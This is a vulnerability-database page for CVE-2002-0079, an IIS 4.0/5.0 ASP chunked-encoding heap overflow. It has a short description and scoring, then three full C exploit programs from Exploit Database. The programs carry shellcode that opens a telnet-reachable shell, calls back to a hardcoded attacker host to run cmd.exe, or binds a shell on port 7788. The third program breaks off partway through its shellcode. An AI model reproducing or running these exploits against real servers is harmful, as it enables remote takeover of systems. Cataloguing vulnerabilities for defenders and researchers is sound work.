CVE-2002-0079 : Detail

96.33% V3
Network
2003-04-02 03h00 +00:00
2011-07-16 22h00 +00:00

CVE Descriptions

Buffer overflow in the chunked encoding transfer mechanism in Internet Information Server (IIS) 4.0 and 5.0 Active Server Pages allows attackers to cause a denial of service or execute arbitrary code.

CVE Information

Metrics

Metrics   Score   Severity   CVSS Vector                    Source
V2        7.5                AV:N/AC:L/Au:N/C:P/I:P/A:P     [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile is therefore the way to compare the EPSS score of one CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 21368

Publication date : 2002-04-09 22h00 +00:00
Author : CHINANSL Security Team
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/4485/info
//
// A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host.
// Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable.
// A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.

/*
   Windows 2000 Server Exploit By CHINANSL Security Team.
   Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
   Warning:THIS PROGRAM WILL ONLY TEST.
   CHINANSL Technology CO.,LTD
   http://www.chinansl.com
   [email protected]
*/

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#pragma comment (lib,"Ws2_32")

int main(int argc, char* argv[])
{
    if(argc != 4)
    {
        printf("%s ip port aspfilepath\n\n",argv[0]);
        printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n",argv[0]);
        puts(" programed by [email protected]");
        return 0;
    }

    DWORD srcdata=0x01e2fb1c-4;//0x00457474; //address of SHELLCODE
    DWORD jmpaddr=0x00457494;//0x77ebf094;//0x01e6fcec;//"\x1c\xfb\xe6 \x01";///"\x0c\xfb\xe6\x01";
    char* destIP=argv[1];
    char* destFile=argv[3];
    int webport=atoi(argv[2]);
    char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02 \x02" "PADP"; //16 bytes

    WSADATA ws;
    SOCKET s;
    long result=0;

    if(WSAStartup(0x0101,&ws) != 0)
    {
        puts("WSAStartup() error");
        return -1;
    }

    struct sockaddr_in addr;
    addr.sin_family=AF_INET;
    addr.sin_port=htons(webport);
    addr.sin_addr.s_addr=inet_addr(destIP);

    s=socket(AF_INET,SOCK_STREAM,0);
    if(s==-1)
    {
        puts("Socket create error");
        return -1;
    }

    if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1)
    {
        puts("Cannot connect to the specified host");
        return -1;
    }

    char buff[4096];
    char* shellcode=
    "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33 \xc9\x89"
    "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65 \x6c\x33\x32"
    "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32 \x2e\xab"
    "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32 \xc0\x4f"
    "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53 \xff\xd0\x89"
    "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53 \xff\xd0"
    "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75 \xfc\xff\xd3\x89"
    "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6 \x66\xbe"
    "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66 \xbe\x3e\x02\x56"
    "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56 \xff\x75\xfc"
    "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75 \xfc\xff\xd3\x89"
    "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75 \xfc\xff\xd3\x89"
    "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75 \xfc\xff\xd3\x89"
    "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45 \xe0\x6a"
    "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8 \xff\xd3"
    "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3 \x89\x45"
    "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13 \xff\x75\xf8"
    "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45 \xc8\x6a"
    "\x03\xff\x75\xf8\xff\xd3\x89\x85 \x1c\xff\xff\xff\x8d\x7d\xa0\x32"
    "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0 \xab\xf7\xd0"
    "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8 \xab\x33\xc0"
    "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50 \xff\x55"
    "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4 \x6a\x10"
    "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75 \xc4\xff"
    "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45 \xc0\x33"
    "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50 \xff\x55"
    "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45 \x94\x50"
    "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44 \x32\xc0"
    "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01 \x89\x47"
    "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89 \x47\x3c"
    "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85 \x38\xff"
    "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51 \x53\xff"
    "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34 \xff\xff\xff\x89"
    "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85 \x2c\xff\xff\xff\x50"
    "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85 \x2c\xff\xff\xff\x85"
    "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85 \x2c\xff\xff\xff\x50\x53"
    "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0 \x74\x6d"
    "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30 \xff\xff\xff\xff"
    "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90 \x90\x90"
    "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90 \x33\xc0"
    "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0 \xff\x55\xc8"
    "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50 \x8d\x85"
    "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30 \xff\xff"
    "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4 \xff\x75\xc4"
    "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95 \x1c\xff\xff\xff\x6a"
    "\xff\xff\x95\x18\xff\xff\xff";

    char* s1="POST ";// HTTP/1.1\r\n";
    char* s2="Accept: */*\r\n";
    char* s4="Content-Type: application/x-www- form-urlencoded\r\n";
    char* s5="Transfer-Encoding: chunked\r\n\r\n";
    char* sc="0\r\n\r\n\r\n";

    char shellcodebuff[1024*8];
    memset(shellcodebuff,0x90,sizeof(shellcodebuff));
    memcpy(&shellcodebuff[sizeof(shellcodebuff)-strlen(shellcode)-1],shellcode,strlen(shellcode));
    shellcodebuff[sizeof(shellcodebuff)-1] = 0;

    char sendbuff[1024*16];
    memset(sendbuff,0,1024*16);
    sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: % s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n% s",s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad/*,srcdata,jmpaddr*/,sc);
    int sendlen=strlen(sendbuff);
    *(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr;
    *(DWORD *)strstr(sendbuff,"AAAA") = srcdata;

    result=send(s,sendbuff,sendlen,0);
    if(result == -1 )
    {
        puts("Send shellcode error!");
        return -1;
    }

    memset(buff,0,4096);
    result=recv(s,buff,sizeof(buff),0);
    if(strstr(buff,"<html>") != NULL)
    {
        shutdown(s,0);
        closesocket(s);
        puts("Send shellcode error!Try again!");
        return -1;
    }

    shutdown(s,0);
    closesocket(s);

    printf("\nUse <telnet %s 1111> to connect to the host\n",destIP);
    puts("If you cannot connect to the host,try run this program again!");
    return 0;
}
Exploit Database EDB-ID : 21369

Publication date : 2002-04-13 22h00 +00:00
Author : hsj
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/4485/info
//
// A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host.
// Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable.
// A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.

/*
   IIS5.0 .asp overrun remote exploit
   Programmed by hsj : 02.04.14

   code flow: overrun -> exception -> rewrite top-level handler -> exception -> shellcode -> make back channel -> exec cmd.exe
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>

#define RET 0x0045C560 /* our payload. ugh, direct jump!!!#$% */
#define REWRITE 0x77eaf44c /* top-level exception handler */
#define PORT 25
#define ADDR "attacker.mydomain.co.jp"
#define PORT_OFFSET 518
#define ADDR_OFFSET 523

unsigned char shellcode[]=
/* decoder */
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1d\x8d\xa0\xf0"
"\xfb\xff\xff\x83\xe4\xfc\x8d\x6c\x24\x10\x33\xc9\x66\xb9\x85\x02"
"\x80\x30\x95\x40\xe2\xfa"
/* code */
"\x7d\x21\x95\x95\x95\xd2\xf0\xe1\xc5\xe7\xfa\xf6\xd4\xf1\xf1\xe7"
"\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7\xec\xd4"
"\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd6\xe7\xf0\xf4"
"\xe1\xf0\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb"
"\xf4\xf8\xf0\xf1\xc5\xfc\xe5\xf0\x95\xc2\xe7\xfc\xe1\xf0\xd3\xfc"
"\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95\xc6\xf9\xf0\xf0"
"\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95\xd6\xf9"
"\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xe2\xe6\xa7\xca\xa6\xa7"
"\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe"
"\xf0\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6"
"\xfa\xfb\xfb\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3"
"\x95\xf6\xf8\xf1\xbb\xf0\xed\xf0\x95\xcf\xc7\x2e\x95\x95\x65\xe2"
"\x14\xae\xd8\xcf\x05\x95\xe1\x96\xde\x7e\x60\x1e\xe6\xa9\x96\x66"
"\x1e\xe3\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xc3\xa6\x55"
"\xc2\xc4\x1e\xaa\x96\x6e\x1e\x67\xa6\x5c\x24\x9b\x66\x33\xcc\xca"
"\xe1\x9d\x16\x52\x91\xd5\x77\x7d\x6a\x74\xcb\x1e\xc3\xb1\x96\x46"
"\x44\x75\x96\x57\xa6\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74"
"\x97\x96\x54\x1e\x85\x96\x46\xcb\x1e\x6b\xa6\x5c\x24\x9c\x7d\xdf"
"\x94\x95\x95\x16\x53\x99\xc7\xc3\x6a\xc2\x49\xcf\x1e\x4d\xa6\x5c"
"\x24\x93\x7d\xa3\x94\x95\x95\x16\x53\x90\x52\xd0\x95\x99\x95\x95"
"\x95\x52\xd0\x91\x95\x95\x95\x95\x52\xd0\x9d\x94\x95\x95\x95\xff"
"\x95\xc0\x18\xd0\x65\xc5\x18\xd0\x61\xc5\x6a\xc2\x5d\xff\x95\xc0"
"\x18\xd0\x6d\xc5\x18\xd0\x69\xc5\x6a\xc2\x5d\xa6\x55\xa6\x5c\x24"
"\x84\xc2\x1e\x68\x66\x3e\xca\x52\xd0\x95\xd1\x95\x95\x95\x1e\xd0"
"\x65\x1c\xd0\xa9\x1c\xd0\xd5\x1e\xd0\x69\x1c\xd0\xad\x52\xd0\xb9"
"\x94\x94\x95\x95\x18\xd0\xd1\xc5\xc0\xc4\xc4\xc4\xd4\xc4\xdc\xc4"
"\xc4\xc3\xc4\x6a\xc2\x59\x6a\xe0\x65\x6a\xc2\x71\x6a\xe0\x69\x6a"
"\xc2\x71\xc0\xfd\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x30"
"\x95\x95\x95\xc5\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11"
"\x01\x95\x95\x95\x1e\x4d\xf3\x52\xd0\x95\x97\x95\xf3\x52\xd0\x97"
"\x2e\x3f\x52\xd0\x91\x48\x59\x2e\x3f\xff\x85\xc0\xc6\x6a\xc2\x61"
"\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc2\xc4\xc4\xc4\x6a\xe0\x61\x6a"
"\xc2\x45\x10\x55\xe1\xcb\x05\x05\x05\x05\x16\xaa\x95\xe1\xba\x05"
"\x05\x05\x05\xff\x95\xc2\xfd\x95\x91\x95\x95\xc0\x6a\xe0\x61\x6a"
"\xc2\x4d\x10\x55\xe1\xab\x05\x05\x05\x05\xff\x95\x6a\xa2\xc0\xc6"
"\x6a\xc2\x6d\x16\x6d\x6a\xe1\xb9\x05\x05\x05\x05\x7e\x27\xff\x95"
"\xfd\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xeb\x83\x05\x05"
"\x05\x05\xff\x95\xc2\xc5\xc0\x6a\xe0\x6d\x6a\xc2\x41\xff\xa7\x6a"
"\xc2\x49\x7e\x19\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\x1f\x93\xd3"
"\x11\x55\xe0\x6c\xc4\xc7\xc3\xc6\x6a\x47\xcf\xcc\x1c\x92\xd2\xd2"
"\xd2\xd2\x77\x7c\x56";

unsigned int resolve(char *name)
{
    struct hostent *he;
    unsigned int ip;

    if((ip=inet_addr(name))==(-1))
    {
        if((he=gethostbyname(name))==0)
            return 0;
        memcpy(&ip,he->h_addr,4);
    }
    return ip;
}

int make_connection(char *address,int port)
{
    struct sockaddr_in server,target;
    int s,i,bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;
    memset((char *)&server,0,sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = htonl(INADDR_ANY);
    server.sin_port = 0;
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = resolve(address);
    if(target.sin_addr.s_addr==0)
    {
        close(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctl(s,FIONBIO,&bf);
    tv.tv_sec = 10;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        close(s);
        return -3;
    }
    if(i==0)
    {
        close(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        close(s);
        errno = bf;
        return -5;
    }
    ioctl(s,FIONBIO,&bf);
    return s;
}

int main(int argc,char *argv[])
{
    int i,j,s;
    unsigned int cb;
    unsigned short port;
    char buf[8192],buf2[16384],path[256];

    if(argc<3)
    {
        printf("usage :$ %s ip port [asp-path]\n",argv[0]);
        return -1;
    }
    if(argc>3)
    {
        strncpy(path,argv[3],sizeof(path));
        path[sizeof(path)-1] = 0;
    }
    else
        strcpy(path,"/iisstart.asp");
    if(!(cb=resolve(ADDR)))
        return -2;
    s = make_connection(argv[1],atoi(argv[2]));
    if(s<0)
    {
        printf("connect error:[%d].\n",s);
        return -3;
    }
    j = strlen(shellcode);
    port = htons(PORT);
    port ^= 0x9595;
    cb ^= 0x95959595;
    *(unsigned short *)&shellcode[PORT_OFFSET] = port;
    *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
    for(i=0;i<strlen(shellcode);i++)
    {
        if(((shellcode[i]>=0x09)&&(shellcode[i]<=0x0d))||
           (shellcode[i]==0x25)||(shellcode[i]==0x2b)||
           (shellcode[i]==0x3d))
            break;
    }
    if(i!=j)
    {
        printf("bad portno or ip address...\n");
        close(s);
        return -4;
    }
    for(i=0;i<sizeof(buf)-strlen(shellcode)-12-1;)
    {
        buf[i++] = 0xeb;
        buf[i++] = 0x06;
    }
    *(unsigned int *)&buf[i] = 0x41414141;
    *(unsigned int *)&buf[i+4] = 0x41414141;
    *(unsigned int *)&buf[i+8] = 0x41414141;
    memcpy(&buf[sizeof(buf)-strlen(shellcode)-1],shellcode,strlen(shellcode));
    buf[sizeof(buf)-1] = 0;
    sprintf(buf2,"POST %s?%s HTTP/1.0\r\n"
                 "Content-Type: application/x-www-form-urlencoded\r\n"
                 "Transfer-Encoding: chunked\r\n\r\n"
                 "10\r\nABCDEFGHIJKLMNOP\r\n"
                 "4\r\nXXXX\r\n"
                 "4\r\nYYYY\r\n"
                 "0\r\n\r\n\r\n",
                 path,buf);
    j = strlen(buf2);
    *(unsigned int *)strstr(buf2,"YYYY") = REWRITE;
    *(unsigned int *)strstr(buf2,"XXXX") = RET;
    write(s,buf2,j);
    printf("---");
    for(i=0;i<j;i++)
    {
        if((i%16)==0)
            printf("\n");
        printf("%02X ",buf2[i]&0xff);
    }
    printf("\n---\n");
    sleep(3);
    shutdown(s,2);
    close(s);
    printf("Done.\n");
    return 0;
}
Exploit Database EDB-ID : 21370

Publication date : 2002-04-09 22h00 +00:00
Author : NeMeS||y
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/4485/info
//
// A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services). This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host.
// Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable.
// A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.

/*
 * DDK - 2k2 -
 *
 *
 * coded by NeMeS||y tnx to Birdack
 *
 *
 */

// IIS 4(NT4) - IIS 5(2K) .asp bof

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>

#define RET_BRUTE_START 0x00400000
#define RET_BRUTE_STOP 0x00500000
#define PORT_BIND 7788
#define VERSION "0.3b"

unsigned char wincode[] =
"\xeb\x18\x5f\x57\x5e\x33\xc9\xac\x3a\xc1\x74\x13\x3c\x30\x74\x05"
"\x34\xaa\xaa\xeb\xf2\xac\x2c\x40\xeb\xf6\xe8\xe3\xff\xff\xff\xff"
"\x21\x46\x30\x6b\x46\xea\xa3\xaa\xaa\xf9\xfc\xfd\x27\x17\x6a\x30"
"\x9c\x55\x55\x13\xfa\xa8\xaa\xaa\x12\x66\x66\x66\x66\x59\x30\x41"
"\x6d\x30\x6f\x30\x46\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d\x30\x6f\x9e"
"\x5d\x55\x55\xba\xaa\xaa\xaa\x43\x48\xac\xaa\xaa\x30\x65\x30\x6f"
"\x30\x42\x5d\x55\x55\x27\x17\x5e\x5d\x55\x55\xce\x30\x4b\xaa\xaa"
"\xaa\xaa\x23\xed\xa2\xce\x23\x97\xaa\xaa\xaa\xaa\x6d\x30\x6f\x5e"
"\x5d\x55\x55\x55\x55\x55\x55\x21\x30\x6f\x30\x42\x5d\x55\x55\x29"
"\x42\xad\x23\x30\x6f\x52\x5d\x55\x55\x6d\x30\x6f\x30\x4e\x5d\x55"
"\x55\xaa\xaa\x4a\xdd\x42\xd4\xac\xaa\xaa\x29\x17\x30\x46\x5d\x55"
"\x55\xaa\xa5\x30\x6f\x77\xab\xaa\xaa\x21\x27\x30\x4e\x5d\x55\x55"
"\x30\x6b\x6b\xaa\xaa\xab\xaa\x23\x27\x30\x4e\x5d\x55\x55\x30\x6b"
"\x17\x30\x4e\x5d\x55\x55\xaa\xaa\xaa\xd2\xdf\xa0\x6d\x30\x6f\x30"
"\x4e\x5d\x55\x55\xaa\xaa\x5a\x15\x21\x30\x7f\x30\x4e\x5d\x55\x55"
"\x99\x6a\xcc\x21\xa8\x97\xe7\xf0\xaa\xaa\xa5\x30\x6f\x30\x70\xab"
"\xaa\xaa\x21\x27\x30\x4e\x5d\x55\x55\x21\xfb\x96\x21\x30\x6f\x30"
"\x4e\x5d\x55\x55\x99\x63\xcc\x21\xa6\xba\x30\x6b\x53\xfa\xef\xaa"
"\xaa\xa5\x30\x6f\xd3\xab\xaa\xaa\x21\x30\x7f\x30\x4e\x5d\x55\x55"
"\x21\xe8\x96\x21\x27\x30\x4e\x5d\x55\x55\x21\xfe\xab\xd2\xa9\x30"
"\x7f\x30\x4e\x5d\x55\x55\x23\x30\x7f\x30\x4a\x5d\x55\x55\x21\x30"
"\x6f\x30\x4a\x5d\x55\x55\x21\xe2\xa6\xa9\x27\x30\x4e\x5d\x55\x55"
"\x23\x27\x36\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\x30\x6b\x90"
"\xe1\xef\xf8\xe4\xa5\x30\x6f\x99\xab\xaa\xaa\x21\x30\x6f\x36\x5d"
"\x55\x55\x30\x6b\xd2\xae\xef\xe6\x99\x98\xa5\x30\x6f\x8a\xab\xaa"
"\xaa\x21\x27\x30\x4e\x5d\x55\x55\x23\x27\x3e\x5d\x55\x55\x21\x30"
"\x7f\x30\x4a\x5d\x55\x55\x21\x30\x6f\x30\x4e\x5d\x55\x55\xa9\xe8"
"\x8a\x23\x30\x6f\x36\x5d\x55\x55\x6d\x30\x6f\x32\x5d\x55\x55\xaa"
"\xaa\xaa\xaa\x41\xb4\x21\x27\x32\x5d\x55\x55\x29\x6b\xab\x23\x27"
"\x32\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\x29\x68\xae\x23\x30"
"\x7f\x36\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d\x55\x55\x21\x27\x32"
"\x5d\x55\x55\x91\xe2\xb2\xa5\x27\x6a\xaa\xaa\xaa\x21\x30\x7f\x36"
"\x5d\x55\x55\x21\xa8\x21\x27\x30\x4e\x5d\x55\x55\x30\x6b\x96\xab"
"\xed\xcf\xde\xfa\xa5\x30\x6f\x30\x4a\xaa\xaa\xaa\x21\x30\x7f\x36"
"\x5d\x55\x55\x21\xa8\x21\x27\x30\x4e\x5d\x55\x55\x30\x6b\xd6\xab"
"\xae\xd8\xc5\xc9\xeb\xa5\x30\x6f\x30\x6e\xaa\xaa\xaa\x21\x30\x7f"
"\x32\x5d\x55\x55\xa9\x30\x7f\x32\x5d\x55\x55\xa9\x30\x7f\x30\x4e"
"\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d\x55\x55\x21\xe2\x8e\x99\x6a"
"\xcc\x21\xae\xa0\x23\x30\x6f\x36\x5d\x55\x55\x21\x27\x30\x4a\x5d"
"\x55\x55\x21\xfb\xba\x21\x30\x6f\x36\x5d\x55\x55\x27\xe6\xba\x55"
"\x23\x27\x36\x5d\x55\x55\x21\x30\x7f\x36\x5d\x55\x55\xa9\x30\x7f"
"\x36\x5d\x55\x55\xa9\x30\x7f\x36\x5d\x55\x55\xa9\x30\x7f\x36\x5d"
"\x55\x55\xa9\x30\x7f\x30\x4e\x5d\x55\x55\x21\x30\x6f\x30\x4a\x5d"
"\x55\x55\x21\xe2\xb6\x21\xbe\xa0\x23\x30\x7f\x36\x5d\x55\x55\x21"
"\x30\x6f\x36\x5d\x55\x55\xa9\x30\x6f\x30\x4e\x5d\x55\x55\x23\x30"
"\x6f\x30\x46\x5d\x55\x55\x41\xaf\x43\xa7\x55\x55\x55\x43\xbc\x54"
"\x55\x55\x27\x17\x5e\x5d\x55\x55\x21\xed\xa2\xce\x30\x49\xaa\xaa"
"\xaa\xaa\x29\x17\x30\x46\x5d\x55\x55\xaa\xdf\xaf\x43\xdf\xae\xaa"
"\xaa\x21\x27\x30\x42\x5d\x55\x55\xcc\x21\xbb\xcc\x23\x30\x7f\x86"
"\x5d\x55\x55\x21\x30\x6f\x30\x42\x5d\x55\x55\x29\x6a\xa8\x23\x30"
"\x6f\x30\x42\x5d\x55\x55\x6d\x30\x6f\x36\x5d\x55\x55\xab\xaa\xaa"
"\xaa\x41\xa5\x21\x27\x36\x5d\x55\x55\x29\x6b\xab\x23\x27\x36\x5d"
"\x55\x55\x29\x17\x36\x5d\x55\x55\xbb\xa5\x27\x30\x7f\xaa\xaa\xaa"
"\x29\x17\x36\x5d\x55\x55\xa2\xdf\xb4\x21\x5e\x21\x30\x7f\x30\x42"
"\x5d\x55\x55\xf8\x55\x30\x7f\x1e\x5d\x55\x55\x91\x5e\x3a\xe9\xe1"
"\xe9\xe1\x23\x30\x6f\x3e\x5d\x55\x55\x41\x80\x21\x5e\x21\x30\x6f"
"\x30\x42\x5d\x55\x55\xfa\x21\x27\x3e\x5d\x55\x55\xfb\x55\x30\x7f"
"\x30\x46\x5d\x55\x55\x91\x5e\x3a\xe9\xe1\xe9\xe1\x21\x30\x7f\x36"
"\x5d\x55\x55\x23\x30\x6e\x30\x7f\x1a\x5d\x55\x55\x41\xa5\x21\x30"
"\x6f\x30\x42\x5d\x55\x55\x29\x6a\xab\x23\x30\x6f\x30\x42\x5d\x55"
"\x55\x21\x27\x30\x42\x5d\x55\x55\xa5\x14\xbb\x30\x6f\x78\xdf\xba"
"\x21\x30\x6f\x30\x42\x5d\x55\x55\xa5\x14\xe2\xab\x30\x6f\x63\xde"
"\xa8\x41\xa8\x41\x78\x21\x30\x7f\x30\x42\x5d\x55\x55\x29\x68\xab"
"\x23\x30\x7f\x30\x42\x5d\x55\x55\x43\xe5\x55\x55\x55\x21\x5e\xc0"
"\xac\xc0\xab\xc0\xa8\x55\x30\x7f\x7e\x5d\x55\x55\x91\x5e\x3a\xe9"
"\xe1\xe9\xe1\x23\x30\x6f\xe6\x5d\x55\x55\xcc\x6d\x30\x6f\x92\x5d"
"\x55\x55\xa8\xaa\xcc\x21\x30\x6f\x86\x5d\x55\x55\xcc\x23\x30\x6f"
"\x90\x5d\x55\x55\x6d\x30\x6f\x96\x5d\x55\x55\xaa\xaa\xaa\xaa\x6d"
"\x30\x6f\x36\x5d\x55\x55\xab\xaa\xaa\xaa\x29\x17\x36\x5d\x55\x55"
"\xaa\xde\xf5\x21\x5e\xc0\xba\x27\x27\x92\x5d\x55\x55\xfb\x21\x30"
"\x7f\xe6\x5d\x55\x55\xf8\x55\x30\x7f\x72\x5d\x55\x55\x91\x5e\x3a"
"\xe9\xe1\xe9\xe1\x23\x30\x6f\x36\x5d\x55\x55\xcc\x21\x30\x6f\x90"
